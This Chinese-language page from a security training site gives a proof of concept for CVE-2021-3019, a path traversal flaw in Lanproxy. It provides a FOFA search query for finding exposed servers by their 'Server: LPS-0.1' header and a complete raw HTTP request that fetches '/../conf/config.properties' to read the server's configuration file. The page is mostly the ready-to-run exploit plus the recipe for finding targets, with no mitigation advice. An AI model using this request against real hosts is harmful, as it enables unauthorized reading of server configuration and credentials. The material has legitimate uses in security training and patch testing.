CVE-2021-3019 Lanproxy 路径遍历漏洞

FOFA搜索:

header= “Server: LPS-0.1”

POC

GET /../conf/config.properties HTTP/1.1
Host: host:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 29
Origin: http://host:8090
Connection: close
Referer: http://host:8090/

{"username":"","password":""}

 

Tips:鼠标经过代码时会出现工具栏,工具栏上方有一键复制代码的功能哦~天云网络培训,专注于网络空间安全相关培训,并提供相关课程的在线培训 报名微信 tyedu1
天云网络培训 » CVE-2021-3019 Lanproxy 路径遍历漏洞

提供专业、易懂、平民化教育。让每个热爱网络的人有个归宿

立即查看 了解详情